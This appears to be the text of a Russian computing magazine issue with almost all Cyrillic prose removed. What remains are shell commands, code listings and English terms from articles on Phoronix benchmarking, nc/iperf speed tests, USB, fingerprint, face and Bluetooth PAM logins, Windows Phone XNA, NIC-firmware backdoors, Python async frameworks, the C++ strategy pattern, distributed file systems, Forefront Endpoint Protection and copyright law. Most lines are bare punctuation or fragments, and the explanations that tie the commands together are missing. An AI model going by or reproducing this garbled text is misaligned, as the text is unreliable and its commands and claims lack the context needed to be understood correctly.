$ phoronix-test-suite list-available-tests

:
/
.
openbenchmarking.org,
allow_url_fopen, file_uploads, allow_url_include PHP.
,
. : System, Processor, Memory,
Disk, Graphics, Network .
, Network : Loopback TCP Network Performance.
PTS 3.2.1 118 46
.
, - . ,
:
$ phoronix-test-suite info compress-7zip

, , ,
( ,
, 10 ). ,

$ phoronix-test-suite make-download-cache

~/.phoronix-test-suite/download-cache/,
.
7-zip:
$ phoronix-test-suite benchmark compress-7zip


PTS
7-zip . PTS
, , - .
.
, PTS . , . :
$ phoronix-test-suite list-available-suites

, compilation:
*
*
*
*
*

pts/build-apache
pts/build-php
pts/build-mplayer
pts/build-linux-kernel
pts/build-imagemagick


, .
$ phoronix-test-suite list-available-virtual-suites

, :
* all ;
* installed ;
* system|processor|graphics
.

PTS HTML-,
. merge-results.
show-result.
, PTS -
.
, openbenchmarking.org , PTS
. , ( )
.
300 .
Linux
. , ,
, .
, openbenchmarking.org,

PTS, , , . PTS
openbenchmarking.org :

Phoronix Test Suite


$ phoronix-test-suite openbenchmarking-login

PTS
. openbenchmarking.org
: ~/.phoronix-test-suite/test-profiles/pts,
, , , .
, build-php ,
php 5.2.9, , .
downloads.xml -
pre- postinstall.sh.

? , , speedtest.net internet.yandex.ru.
- (,
Ubuntu). , - .
?
nc.
nc, 1234:
$ nc -q 0 -l 1234 > /tmp/big_file

- ,
:
$ time cat /tmp/big_file | nc -q0 server_IP 1234

, ,
, iperf.
:
# apt-get install iperf

:
$ iperf -s

TCP/5001. :
$ iperf -c server_host

Bandwidth .
, '-t' .
iperf TCP-. UDP, '-u' . UDP
, ,
. z


UNIXOID
(execbit.ru)


,
?
, , ,
SSH
, ?
, , ,
.
. sexhero iamsuperman
.
,
, ,
-


, ,
. XXI , ,
,
,
. .
, - , ,
- .

fprint_demo libfprint


. :
, ,
.
, .
,
( ,
). ?
USB-. , ,
,
, .
,

PAM- pam_usb (pamusb.org),
,
,
.
, , .

, , ,
,

( - ,
,
, ).

, , pam_usb
. (SD, MMC) . pam_usb
. .
1. libpam_usb.so :
$ sudo apt-get install libpam-usb pamusb-tools

2. ,
, USB-
:
$ sudo pamusb-conf --add-device

pam_usb pam_fprint PAM


pam_usb
, 2 . Udisks ( ,
,
-), ,
.
3. pam_usb ,
(
vasya):
$ sudo pamusb-conf --add-user vasya

4.
, . -
, :
$ sudo pamusb-check vasya

5. pam_usb ,
. Ubuntu ,
Debian, /etc/pam.d/common-auth.
( ):
auth required pam_unix.so

:
auth sufficient pam_usb.so

PAM, pam_usb,
, . ,
, , sufficient
required. ,
, ( , ), pam_usb
, pamusb-agent.
pamusb-agent
.
, /etc/pamusb.conf :

INFO

info
/etc/pam.d/common-auth
Gentoo Mandriva
/etc/pam.d/system-auth,
FreeBSD
/etc/pam.d/system.
ArchLinux
PAM-

.


/etc/nologin SSH-.


root
.


UNIXOID


USB-Flash

/etc/pamusb.conf
USB-

<user id="_">
<device>_</device>
...
<agent event="lock">
gnome-screensaver-command --lock</agent>
<agent event="unlock">
gnome-screensaver-command --deactivate</agent>
...
</user>

Gnome. pamusb-agent
, gnome-screensaver-command --lock gnome-screensaver-command --deactivate .
pamusb-agent :
$ pamusb-agent

, :
$ cd ~/.config/autostart
$ ln -s /usr/bin/pamusb-agent pamusb-agent

pam_usb
, -.
SD- ,
, (
USB-). , .
. ,
,
Windows. freedesktop.org
fprint (www.freedesktop.org/wiki/Software/fprint),

PAM-,
.
libfprint ,
:
$ sudo apt-get install libfprint0 \
libpam-fprint fprint-demo


$ fprint_demo

, .
pam_fprint_enroll,
, :
# pam_fprint_enroll enroll-finger 7

7 .
fprint , 1 , 10 .
, pam_fprint PAM ,
/etc/pam.d/common-auth, auth required pam_unix.so
, pam_fprint:
auth sufficient pam_fprint.so

, .
,
, -.
,
, ,
.
Linux- ,

pam-face-authentication (www.pam-face-authentication.org), ,
, PAM- .

Ubuntu. , ,
. ,
,
. Ubuntu ( )
, :
$ sudo apt-get install build-essential cmake \
qt4-qmake libx11-dev libcv-dev libcvaux-dev \
libhighgui4 libhighgui-dev libqt4-dev \
libpam0g-dev

:
$ cd
$ wget http://goo.gl/dpD1s
$ tar -xzf pam-face-authentication-0.3.tar.gz

cmake, :
$ cd pam-face-authentication-0.3
$ cmake . && make
$ sudo make install

Ubuntu antonio.chiurazzi:
$ sudo add-apt-repository ppa:antonio.chiurazzi/ppa
$ sudo apt-get update
$ sudo apt-get install pam-face-authentication

:
$ qt-facetrainer

, Capture.
, .
. .
pam_face_authentication.so PAM-. /etc/pam.d/gdm
/etc/pam.d/kdm ( KDE)
:
auth sufficient pam_face_authentication.so enableX

/etc/pam.d/common-auth , ,
/bin/login /bin/su, pam_face
.
PAM-. () /usr/share/pam-configs/face_authentication
:
Name: Manually installed face_authentication profile
Default: yes
Priority: 900
Auth-Type: Primary
Auth:
	[success=end default=ignore]	pam_face_authentication.so enableX

:
$ sudo pam-auth-update --package face_authentication

21- . ,
,
, , ,
.
?
, . USB-, , . , , MAC-,
IMEI, .
,

MAC- Bluetooth.
, Bluetooth , , MAC,
Bluetooth-.
, USB
,
. ,
.
, Bluetooth, ,
.
hcitool ( bluez-utils) :
$ hcitool scan

MAC-, . libpam_blue (
pam_blue, ):
$ sudo apt-get install libpam-blue

/etc/security/bluesscan.conf
:
#
general {
# ( 3 15)
timeout = 15;
}
#
mylogin = {
name = ;
bluemac = MAC- ;
}

, /etc/pam.d/common-auth :
auth sufficient pam_blue.so

, pam_unix.so.
.
pam_blue, , MAC-
. .

Linux .
,
,
. ,
,
, ,
.
,
. . ,
. , , ,
. , , ,
. z


CODING
yurembo (yazevsoft@gmail.com)

WINDOWS
PHONE 7.1
,
!
Microsoft
Windows Phone 7.1 Mango.
(
)
,
.
-: , .
, , .
, . ,
.
Windows Phone 7.0
.
, . ,
,

. ,



Windows Phone Marketplace-. .
DevCon11
Microsoft , Windows Phone 7.1 (Mango)
.
( :), ,

. WP (
), .
, , : ,
.
.

DVD
dvd





. !

. 1.

. 2.

Windows Phone 7.1 Mango

XNA .

( Windows
Phone Rich Graphics Application (4.0)).
,
XNA. . XNA DirectX. ,
, ,
,

. , Microsoft ,
: Windows,
Xbox 360 Windows Phone 7.x.
, , Windows,
. ,
XNA.
.NET Framework
(2002 ) ,
( ,
), ,
Managed DirectX
DirectX, .NET.
DirectX, C++, , . MDX 2.0. : ,
(, , .NET)
,
. , . Microsoft
DirectX , SDK
. 2006 XNA,
SDK,
, , , DirectX.
API,
,
( .), XNA
.

.NET Framework, (
PC ( Windows) Xbox 360).

,
WP, ,
Windows. ,

Microsoft Windows Mobile 6.5,
eMbedded Visual tools,
eMbedded Visual
Basic eMbedded Visual C++.
, Visual Studio 2010,
.NET Framework 4.0 ( , ,
WP 7.1) , ,
Windows Phone Developer Tools
WP 7.1,
Microsoft). , , : Visual Studio 2010 Express,

WP, .NET Framework 4.0, Silverlight 4.0, XNA 4.0, Windows
Phone Emulator. , ( )
WP 7.1,
DirectX 10.

Windows Vista -,
Windows 7 Starter Edition ( ,
:)).
, VS 2010,
C# Visual Basic
. WP-, VS 2010
(. 1).

XNA vs. Silverlight

Windows Phone : Silverlight XNA. .NET. , Windows


Phone .
, Silverlight
( ,
, Windows). ,
XAML
, VS
.
(
), . ,

3D-


Windows Phone 7.1.



.


.

HTTP://WWW
links

create.msdn.com

WP .

INFO

info

,

3D-.
.
trueSpace

. : www.caligari.com.


CODING

spriteBatch.Begin();
spriteBatch.Draw(background, new Rectangle(0, 0, 800, 480), Color.White);
spriteBatch.End();

. 3. 3D
? 3D- WP 7.1.
VS 2010
Visual C# XNA Game Studio 4.0 Windows Phone Game
(4.0).
. .
WP (480×800),
,
. WP
30 fps ( ,
TargetElapsedTime). , WP, DirectX 10, WP DX 9.
, , DX 9. XNA , DX ,
. PC Xbox 360
HiDef,
, DX.
, WP , Reach,
DX 9 .
,
- .
, XNA 4.0 .
. ,
(. 2).

( ).
.
background.jpg. , , , XNA.

. , , , ,
,
. ,
, .

,
. -, Game1.cs,
Game1 :
this.graphics.PreferredBackBufferHeight = 480;
this.graphics.PreferredBackBufferWidth = 800;
this.graphics.IsFullScreen = true;

, . LoadContent() spriteBatch
: background = Content.Load<Texture2D>("Textures/background");. .
Draw, TODO :


SpriteBatch: Begin
( ),
, .
. Draw . (
, ):
, (
). (-, , . .)
SpriteBatch , Begin.
:
. . XNA : *.x *.fbx.
DirectX, ,
, . ,
*.sdkmesh, . Microsoft

meshconvert,
X sdkmesh. *.fbx
Autodesk. , .

.
( trueSpace , ). -.
, ,
, -
.
.

, - ,
.

, ,

. object.cs
,
( ).
, , .
, ,
, XNA.
. . ,
, ,
. ,
,
. ,
.
C# .
Delphi :).
,

, XNA, Y
. DrawObj,

, model.
.
foreach ,

.

. BasicEffect : , - ,
, ,
. ,
, DirectX
. , DX 10, , .
-,
. , , .
XNA , . DrawObj
( foreach) .
, UpdateState,

rotMat-
.
SetupEffects .
,
. , .
trans,
( DrawObj (. ).
,
Game1,
Microsoft.Xna.Framework.Game, .
, ,
. Game1 , , Object
Object car1 = new Object(20); ,
,
. . :
projectionMatrix = Matrix.CreatePerspectiveFieldOfView(
    MathHelper.ToRadians(45.0f), aspectRatio, 1.0f, 100.0f);
viewMatrix = Matrix.CreateLookAt(cameraPosition,
    Vector3.Zero, Vector3.Up);

:
Y , ( ), .
:
( ,
X,Y,Z), , . LoadContent
, : car1.model = Content.Load<Model>("Models/Hotrod");
:
car1.SetupEffects(projectionMatrix, viewMatrix);,
. Update,
Draw ,
Object.
UpdateInput,
, ,
. Draw

. , Object.
base.Draw(gameTime); . , , .
.
, , 3D (. 3).

. - *.wav- (, ) . : ,
, :
SoundEffect sound; // loaded sound effect
SoundEffectInstance soundControl; // instance used to control playback
bool isPlay = false; // true while the sound is playing

LoadContent , ,
:
sound = Content.Load<SoundEffect>("Music/jets014");
soundControl = sound.CreateInstance();
soundControl.IsLooped = true;
soundControl.Play();
isPlay = true;

UpdateInput Back :
if (GamePad.GetState(PlayerIndex.One).Buttons.Back ==
    ButtonState.Pressed) {
    if (isPlay) {
        soundControl.Pause();
        isPlay = false;
    } else {
        soundControl.Play();
        isPlay = true;
    }
}

.
. , ,
, , :)!


WP 7.1 , ,
.
,
: ,
. ,
Windows Phone 7.1.
, ,
( ,
WP7.1 :)) Windows
Phone Marketplace (,
2900 ).
,
, !
Windows Phone
! z


CODING
(stannic.man@gmail.com)

:
( , )
. (
) . ,
, ,
? !

(NIC)
RJ45

PHY block


Ethernet

MAC block

PCI-

NIC
()

NIC <===> PCI


, ,
,
,
, .
, ?
, ,
...
- . ...
.

.

(!)
SSH-,
. -,
( )
(prooflink: alchemistowl.org/arrigo/Papers/Arrigo-Triulzi-PACSEC08-Project-Maux-II.pdf,
radioradar.net/news/electronics_news/avr_crumb644_net.html).
, , : , , ,
-
. -Apache,
,
, , - PCI-

, , .
,
, ,

. , . . - ,
, .

,
, , ,

.
,
,
?

.
,
,
. , firmware
, , - .
, ,
.

TDI-NDIS-
NDIS-, , , ,
NdisRegisterProtocol.
. , , TDI NDIS IM- .
,
, .
NDIS_MINIPORT_BLOCK
,
NDIS_MINIPORT_BLOCK !

NdisRegisterProtocol,
,
.
?
,
,
, PCI.
PCI-,
( ) , PCI-

() PHY MAC-.
RJ45- ,

DVD
dvd


pdf-,
PCI-,

, ,

PCI,
,
,

, .

HTTP://WWW
links

alchemistowl.org/arrigo/index.html,
Arrigo Triulzi,


.


CODING

MAC-.
, ().
CPU, EEPROM-,
SRAM- , . EEPROM, , , MAC- ,
. EEPROM
. SRAM-
firmware, ,
/ . ,
,
. ,
,
.
EEPROM,
SRAM ? , .
PCI-.
PCI- , linear
burst ( ). ,
( ) ,
.

.
PCI , , Plug and Play (PnP).
PCI :
( /,
Microsoft) configuration space .
PCI
PCI Bus Demystified Doug Abbott,
.
PCI-, ,
, ,
PCI-. , :), ,
TDI NDIS, ,
. : ,
.
PCI -,
(memory-mapped I/O).
, , 64 .
32 , 32 / SRAM- .
, ,
PCI-.
PCI-
for (busNumber = 0; !adapterFound && moreBuses; busNumber++)
{
    for (deviceNumber = 0;
         !adapterFound && deviceNumber < PCI_MAX_DEVICES;
         deviceNumber++) {
        slotNumber.u.bits.Reserved = 0;
        slotNumber.u.bits.DeviceNumber = deviceNumber;
        slotNumber.u.bits.FunctionNumber = 0;
        length = HalGetBusData(PCIConfiguration,
                               busNumber,
                               slotNumber.u.AsULONG,
                               configInfo,
                               sizeof(PCI_COMMON_CONFIG));
    }
}

, ,
EEPROM , EEPROM .
? -, EEPROM
non-volatile-. -,
. -,
, EEPROM . EEPROM?
, , ,
, ,
MAC-, firmware-,
: , , PXE (Preboot eXecution
Environment, ) .
, firmware
EEPROM ?
! ,
, :). ? ,
, (
PCI-):
. EEPROM
firmware ( ) EEPROM.
. firmware, , , ;
firmware,
;
MAC- .
, , ,
. , , , , : ,
? : ,
, - . ,
,
.
firmware, , ...
firmware,
. , .
, ,
,
. , , PoC,
.

? ! ,
, . , ,
, . , ,

, EEPROM,
, , , firmware.
PCI .

: PCI-based .
, , ,
. ,
:). ,
! z

CODING
(adil.khashtamov@gmail.com, http://khashtamov.kz)

-
Python

,
-
.
? , !
?

, ,
.

(
, , ). -, ,
,
, . ,
. , , .
, .
10 , ,
10 . ,



DOS-.
, , .
, , . :
s = socket.socket(...)
s.setblocking(ISBLOCKING)
s.connect((host,port))
data = s.recv(1024)
# -
s.close()

, ,
.

Twisted


tornadoweb.org Tornado.
twistedmatrix.com
Twisted.
gunicorn.org WSGI Python-.
gevent.org , libevent.
nichol.as asynchronous-servers-in-python-

Python.
pycon.blip.tv PyCon.

, , ,
,
. , , ,
, // .
- -.
, Windows select(), Linux epoll(), poll(), FreeBSD
kqueue(). , ][
, horiffic, ,
.
(xakep.ru/magazine/xa/042/058/1.asp . .).
, , ,
. ,
, .
.

, ? Python-
, . , ,
Django, ][
. (, ). ,
?

Tornado

, .

FriendFeed. , 2009
Facebook, . Tornado ,
,
.
Tornado. , ,
Django, .
, ! ,
Tornado .
, ,
. , web.py,
Tornado ,
:)
demos , , .
?
-? Tornado -.
MVC (model-view-controller),

, Django.

Twitter, Facebook, Google ,
. . MySQL,
,
Tornado , , MySQL-,
.
PostgreSQL,
MySQL
.


CODING

Tornado
Hello world Tornado :
Hello world Tornado
import tornado.ioloop
import tornado.web

class MainHandler(tornado.web.RequestHandler):
    def get(self):
        self.write("Hello, world")

application = tornado.web.Application([
    (r"/", MainHandler),
])

if __name__ == "__main__":
    application.listen(8888)
    tornado.ioloop.IOLoop.instance().start()

Tornado web.py .
http-,
front-end- nginx, -.
.
:
1. ,
.
2. ,
.
3.
. , .
:
1. .
2. Tornado , .

Twisted

, Twisted
Python.


, .
: TCP/UDP, SSL/
TLS, HTTP, SSH, FTP, IRC, NNTP, XMPP .
Twisted ,
.
, Twisted ,
, ,
. , Twisted
,
. ,
. , Twisted . , Twisted Tornado.
,
Python,
. , -
Twisted, , ,
, Tornado. Twisted (
Tornado Django)
SQL-.
:
1. .
2. .
:
1. , .
2. .

Gunicorn + Gevent

, , Python web-,
.
PyCon,
. WSGI-
Gunicorn Gevent (
WSGI- libevent).
, Gevent , , ,
. Gevent
()
, ,

asyncore
libevent ( Chromium, memcached),
,
. , ,
Gevent
libev, , libevent.

, urllib, ftplib - . ,
, ,
Gevent. , , Gevent:
Gevent
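urls = ['http://www.google.com', 'http://www.yandex.ru',
        'http://www.python.org']
import gevent
from gevent import monkey
# patch the standard library so that blocking socket calls
# yield to other greenlets; must run before urllib2 is imported
monkey.patch_all()
import urllib2

def print_head(url):
    print (' %s' % url)
    data = urllib2.urlopen(url).read()
    print ('%s: %s : %r' % (url, len(data), data[:50]))

# one greenlet per URL, then wait for all of them to finish
jobs = [gevent.spawn(print_head, url) for url in urls]
gevent.joinall(jobs)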

, Gevent
. , monkey.patch_all()
,
,
. , urllib2
,
,
.

:
1. .
2. .
:
1. .
2. , .

asyncore

,
, asyncore.
Asyncore -
( callback), , ,
. asyncore , NIH- (NIH not invented
here), , . , ,
,
, ,
.
, .

! , ,
, .
, - : ,
, ,
.
. ,

,
. ? ,
,
. , , ,
.

Django, . ,
, , ... z


CODING
deeonis (deeonis@gmail.com)

Python
-, , , . .
, , ,
. , .
, .

-
, ,
. . ,
, (,
) ,
.
, . -

,
. , .
- , , ,
- , , .
, , . , , .

. ,
, .
:

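class MobilePhone
{
public:
    // every model draws its own screen, so display() is pure virtual
    virtual void display() = 0;
    void makeSound()
    {
        // sound code shared by all models
    }
    // ...
};
class Nokia3310 : public MobilePhone
{
public:
    void display()
    {
        // Nokia 3310 display code
    }
};
class SiemensA35 : public MobilePhone
{
public:
    void display()
    {
        // Siemens A35 display code
    }
};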

MobilePhone, : display() makeSound().


makeSound ,
. display ,
-,
.
, , mp3-. mp3
- ( ),
. ,
mp3 , . - !

, makePhoto
MobilePhone. ,
, Nokia 3310 -
:).
makePhoto
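class MobilePhone
{
public:
    virtual void display() = 0;
    void makeSound()
    {
        // sound code shared by all models
    }
    // ...
    // new method added to the base class
    void makePhoto()
    {
        // camera code
    }
};
// ...
Nokia3310 mobilePhone;
// compiles, although the Nokia 3310
// has no camera at all
mobilePhone.makePhoto();

UML-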

.

.
( SMS) . , ,
makePhoto ,
, , ,
. , ,
mp3-.
.

, ,

,
. , , Java PHP,
C++ . ,
.
() iPhotoCamera,
makePhoto.
MobilePhone.
iPhotoCamera, 3310
.
iPhotoCamera
class iPhotoCamera
{
public:
    virtual void makePhoto() = 0;
};
// ...
class MotorolaL9 : public MobilePhone, public iPhotoCamera
{
public:
    void makePhoto()
    {
        // camera code
    }
    // ...
};
class MotorolaL7 : public MobilePhone, public iPhotoCamera
{
public:
    void makePhoto()
    {
        // the same camera code, copied from MotorolaL9
    }
    // ...
};

C++

, , ,
, .
,
makePhoto(). - . , cpp makePhoto iPhotoCamera, ,
,
. : , CMOS
CCD...
makePhoto, .
, .
.

,
.
,
. ,
iPhotoCamera, , . , makePhoto
.

, iPhotoCamera. C++
:
makePhoto()
class iPhotoCamera
{
public:
    virtual ~iPhotoCamera() {}
    virtual void makePhoto() = 0;
};
class DoPhoto : public iPhotoCamera
{
public:
    void makePhoto()
    {
        // camera code
    }
};
class CantDoPhoto : public iPhotoCamera
{
public:
    void makePhoto()
    {
        // this phone has no camera,
        // so there is nothing to do
        return;
    }
};

, : DoPhoto CantDoPhoto.
iPhotoCamera
makePhoto(). , ( ) . DoPhoto , CantDoPhoto
, makePhoto .

, . , 3310
. mp3-.
mp3
class iPhoneSound
{
public:
    virtual ~iPhoneSound() {}
    virtual void makeSound() = 0;
};
class PolyphonySound : public iPhoneSound
{
public:
    void makeSound()
    {
        // play a polyphonic ringtone
    }
};
class Mp3Sound : public iPhoneSound
{
public:
    void makeSound()
    {
        // play an mp3 file
    }
};

, . iPhoneSound
PolyphonySound Mp3Sound makeSound(). ,
,
, .

. mp3
-
.
,
.
. -
.
MobilePhone ,
iPhotoCamera, iPhoneSound.
MobilePhone
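class MobilePhone
{
protected:
    // behaviour objects; pointers, so that a concrete
    // implementation can be assigned and replaced later
    iPhotoCamera *photoBehavior;
    iPhoneSound *soundBehavior;
public:
    MobilePhone() : photoBehavior(0), soundBehavior(0) {}
    virtual ~MobilePhone()
    {
        delete photoBehavior;
        delete soundBehavior;
    }
    virtual void display() = 0;
    void makeSound()
    {
        soundBehavior->makeSound();
    }
    void makePhoto()
    {
        photoBehavior->makePhoto();
    }
};

Java
.

MobilePhone makePhoto makeSound, photoBehavior soundBehavior. ,

photoBehavior soundBehavior . , :
MobilePhone
class MotorolaL9 : public MobilePhone
{
public:
    MotorolaL9()
    {
        photoBehavior = new DoPhoto();
        soundBehavior = new Mp3Sound();
    }
    void display()
    {
        // Motorola L9 display code
    }
};
class Nokia3310 : public MobilePhone
{
public:
    Nokia3310()
    {
        photoBehavior = new CantDoPhoto();
        soundBehavior = new PolyphonySound();
    }
    void display()
    {
        // Nokia 3310 display code
    }
};
// ...
MotorolaL9 motor;
// takes a photo
motor.makePhoto();
// plays an mp3
motor.makeSound();

Nokia3310 nokla;
// does nothing: the 3310 has no camera
nokla.makePhoto();
// plays a polyphonic ringtone
nokla.makeSound();

-
. ,
. ,
.
,
.
, , .
, photoBehavior
soundBehavior MobilePhone,

? ,
. , mp3- , set-,
soundBehavior.


class MotorolaL9 : public MobilePhone
{
public:
    MotorolaL9()
    {
        photoBehavior = new DoPhoto();
        soundBehavior = new Mp3Sound();
    }
    // replaces the sound behaviour at run time
    void setIPhoneSound(iPhoneSound *sound)
    {
        delete soundBehavior;
        soundBehavior = sound;
    }
    // display() as in the previous listing
};
// ...
MotorolaL9 motor;
// plays an mp3
motor.makeSound();
// switch the sound behaviour
motor.setIPhoneSound(new PolyphonySound());
// now plays a polyphonic ringtone
motor.makeSound();

. , ,
,
.
.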


, . ,
,
.
. z


SYN/ACK
(execbit.ru)

,
, ,

. ,
, .

,
,
. , ,
, .

,
( - ?)
, ,
. , ,
,

,
.
,
, .
:
1. . ,

. NFS UNIX CIFS Windows.


. ,
.
2. . , . ,
, .
GFS/GFS2 Red Hat OCFS2 Oracle.
, .
3. .
. ,

, ,
. GRID,
, . : Lustre, Ceph,
GlusterFS GoogleFS,
Google.


, ,
.

NFS, CIFS POHMELFS

,
( ,
UNIX) NFS,
Network File System.
NFS Sun Microsystems ( Oracle)
2.0 1989 , RFC1094 ( ,
, , , Sun).
, NFS
.
, (RPC), ,
. NFS
,
SunOS,
. NFS
-
, .
. , ,
NFS-,
(/etc/exports /etc/hosts.allow) nfsd.
, .
,
, NFS
.
NFS .
, NFS

.
.

,

POHMELFS,
Linux
( ).
NFS ,
cache-coherent. NFS ,

,
.
, A
(, ,
, ..),

, , ,


. readonly ,
,
, , .
NFS ,
.
.

OCFS2 GFS2


.
, ,





.
, ,
,
, .
, , SAN,
FibreChannel, iSCSI
AoE.
,
, ,
, .

.
, RAID,
SAN .
,
.
,

INFO

info

-
RADOS (http://ceph.newdream.net/wiki/RADOS_Gateway)

Ceph Amazon
S3.


SYN/ACK

Ceph ,

OCFS2
,
.
, ,
,
,
. , ,
.
, .
,
.
,
, , ,
.
inode. ,
,
inode , ,
GFS2 OCFS2, -


. ,
,
.

. -, ,

(, GFS2 DLM Distributed Lock Manager).

,
, . ,
,
NFS
.
,

(GFS2 OCFS2 ).
, -,
, , ,
.
fencing ,
, ,
, .
,
, ,
, , ,

.
,
.
. , (
), , ,
(
- ). ,
-
, ,
,


POHMELFS (http://www.ioremap.net/projects/pohmelfs),
Linux, ,
. :

( NFS).
.
.

( RAID)
.

.
.
NFS, POHMELFS ,

,

.

, .

,
,
-
. ,
,
,
.

Lustre, Ceph GlusterFS


, ,
,
, ,
, ,
.

,
,
Lustre.
Lustre (www.lustre.com) Cluster
File Systems, Sun Microsystems 2007
. Lustre ( Linux
Cluster) ,

.
Lustre
, ,
.
:
1. (MDS),
, , , ,
..
.
/ ,

OCFS2
.
2. (OSS).
, , .
/
, ,
,

.
(OST),
, ,
.
3. (MGS). . MGS
.
, Lustre,
:
, . ,
,
() , .

(, /lustre).
/ -
,
, .
()
,
(

, ).
Lustre
.


SYN/ACK

Ceph Lustre
, ,
,
(,
,
,
).
Lustre
, POSIX
, . Lustre , -

Lustre-

,
,
.
, .
Ceph GlusterFS.
Ceph (http://ceph.newdream.net)
2007 , ,
, Lustre, . Fuse,
Linux, Linux, 2.6.34.
Ceph
. ,
.
,
.
, ,
,
, ,
.
.
Ceph . , ,
Linux-,
.
,
Fuse, Linux, BSD Mac OS X.


.
,
,
.
, , . z


SYN/ACK
grinder (grinder@ua.fm)


Forefront Endpoint Protection:
Windows
2010 Microsoft
Forefront Endpoint Protection, . ,
, .

Forefront Endpoint Protection


, .
. ,
, Microsoft. , ,
, , .
,
, . NAP (Network
Access Protection), Win2k8 (
12 ][ 2008 ).
, MS , Forefront ( Stirling, , ,
),
ISA Server, Intelligent Application
Gateway, Identity Lifecycle Manager .
Forefront , , , .
MS . ,
. MSRT (Malicious Software Removal
Tool), OneCare Windows Defender,
. MS Security
Essentials (Morro), WinXP-Win7. MSE ( ), MSE
.
Forefront Endpoint Protection, Win, , ,
. Forefront Client Security,
. FEP 2010 2010
. FEP 2012, -
.

FEP 2010
, ,
, ,
. , FEP


, , .
Windows, Windows Firewall,
AppLocker,
. ,
, . ,
,
, - .
FEP c IPS ( ) Network
Inspection System (NIS). , NIS
Forefront TMG 2010, FEP
, . Network Access Protection (NAP).
(Dynamic translation
and Emulation),
, . ,
. , ,
Microsoft Security Essentials
DSS (Dynamic Signature Service).
, (, ), ,
,
Microsoft DSS, SpyNet MRS (Microsoft
Reputation Services). ,
, , .
,
, .
, FEP ,

. FEP
,
,
.
, -
. ,
.
. (

HTTP://WWW
links


Forefront microsoft.com/forefront.
TechNet,

Forefront Endpoint
Protection clck.ru/FwSw.
-
( )
Forefront Endpoint
Protection clck.ru/FiXr.

) , FEP

. ,
,
.
WinXP3/Vista/7
Win2k3/2k8/2k8R2.
Win7 Starter, Win7
Home Vista Basic .

. FEP
,
System Center Configuration Manager. ,
, FEP
.
, ,
SCCM (
08 ][ 2009 ).

,
,
. . ,
, .
FEP, ,
SCCM .
.
, FEP , , :).

SCCM 2007
R3 Win2k8R2
, FEP
2012, 2010.
FEP 2012 SCCM 2012,
.

, Win2k8R2. , .

(
), ,
SCCM 2012, Outlook,
. ,
.
FEP 2010
SCCM 2007 R3, FEP.
R3 ,
SP2, .
SCCM 2007 SP2
08 ][ 2009 ).
, Win2k8R2
,
:). . SCCM 2007,
Win2k3SP2/Win2k8/
R2 SQL Server 2k5SP3/2k8/R2.
, SQL
Analysis Services, Integration Services Reporting Services.
,
. ,

MSSQL , Standard/Enterprise.
,
SQL-
FEP Analysis
Reporting. MSSQL, SQL Server
Agent .

SPN (Service Principal Name) MSSQL.
:

INFO

info



Forefront UAG


09 ][ 2010
.
Forefront
TMG


11 ][ 2009
.
NAP

12 ][ 2008
), SCCM

08
2009 .

>setspn -A MSSQLSvc/srv01.example.org:1433 example\mssqlserver
Registering ServicePrincipalNames for CN=Mssqlserver,CN=Users,DC=example,DC=org
MSSQLSvc/srv01.example.org:1433
Updated object

, , , , SPN


SYN/ACK

Forefront Endpoint Protection 2010

FEP, SCCM

, .
-d
.
, .
:
[Verbose] Retrieved SQL server account: Internal: 'EXAMPLE\ mssqlserver'; External: 'EXAMPLE\mssql'
[Verbose] Retrieved SQL SPN: MSSQLSvc/SRV01
[Verbose] Validating SPN. Account: EXAMPLE\mssqlserver. SPN: mssqlsvc/srv01

Win2k8R2:
PS> Import-Module servermanager
PS> Add-WindowsFeature BITS,RDC,Web-WMI,Web-Dav-Publishing

SCCM 2007 SP2 .


R3 KB977384 (support.microsoft.com/kb/977384) KB2271736 (support.microsoft.com/kb/2271736).

.

Forefront
Endpoint Protection 2012
FEP. FEP
Microsoft Forefront
Endpoint Protection 2010 (clck.ru/G-1V), ,
FEP.
, .
, , , . ,
SCCM
, MS.
, FEP 2010
:). .
.
( , 2012 ,
-):
Basic topology , SCCM, ;
Basic topology with remote reporting database , ,
;



Advanced topology ,
, ..
Install only Configuration Manager Console Extension for FEP 2010
SCCM 2007.
,
Advanced topology .
Reporting Services. URL
. URL, , FQDN .
, MS FEP Windows
Update. , .
Microsoft SpyNet.
. Basic, MS .
, , Advanced . . , ,
.
, .
, ,
. , . ,
.

FEP ,

FEP,
,
, , .
,
SCCM
( , MSSQL)
. ,
, SCCM .
SCCM Computer Management
Forefront Endpoint Protection,
, .
Policies ( ), Alerts ( 4 ) Reports ().
, FEP-*,
Computer Management Desired Configuration Management
Configuration Baselines. . ,
SCCM.
. ,
( ]
[ 08.2009), . Distribute
Software. ,
Select an existing package Microsoft Corporation FEP
Deployment 1.0. ,
, ,
.
, . ,
. , , Deployment Overview.


. ,
, Policies.
, New Policy.
. ( , ). ,
Policy Template,
.
, , (UNC, WSUS
Windows Update).

SCCM 2012
-, . ,
. Windows Firewall , . ,
Edit Policy Precedence
.

, SCCM .
FEP
:
Forefront Endpoint Protection
2010 Security Management Pack.

Forefront Endpoint Protection Server Health Monitoring Management
Pack.
Forefront Endpoint Protection 2010.
.
, GPO ,
.

SCCM, Forefront Endpoint


Protection .
, .
, , FEP , - . z

. .,


!
,

, . ,
. , ,
, ( , ) , , .

- -
(. 1225 1259 ). ,
(. 1257). . , ,
.

.
, , , ,
, . ,
, , /
- ,
(
, ). ,
(),
(. 1227 ). , ,
, , .
?
, ? , .
.
. 1295 .
( ),
.

. - ,
.
(. ).
, . ,
,
. -
(c) .
, .
, , XIV : , .
.
, -
, , , .



,
(. 1288 ), ,
. ,
(. 4 .
1233). ,
, .

,
(, ,
, , ),
,
.
(, , ), () . -,
/ - (MSOffice,
1, ).
, , ,
, . .

(. 1 . 1233), ,
(. 1 . 1229). , , , ,
. ? ? ,
* . :
( , );
( );
( ).
,
, ( 50
).
, .

,
. :
, ,
.

IP-

IDS Snort

html- ;
Perl, Java, JavaScript, PHP ..

html-

,
(
)

/ ;

.

.
, ,
. , . .
,
.
.
. ,
, .
, .
? , , ?
, .


( ),
.
.
(, )
,
. . . (, )
.
.
.

. - .


1295.

1265.

www.consultant.ru/popular/gkrf4/79_2.html#p668

base.garant.ru/10164072/70/#41265

1. ,
,
() ( ),
.

1.


, ()
, ,
,


. .

2.
,

.
,
,
,

,
.
,
,

, .

,

.
,

, .
3. , 2

,
,
, ,
,
.
,
,
, , ,
, .


.


.
, ,
, ..

,
() - ,
, .
,
.
, ,


2.
( ,
) (
1 1287),
,

.
,

.

,
.
. ,
,
. ,
.

, . , .
(. 2 3 . 146 ).
, 50 000 . ,
, -
.
, .
,
.
, ,
. 50 ( ),
.

(. 7.12 ),
.
,
. ,

. .
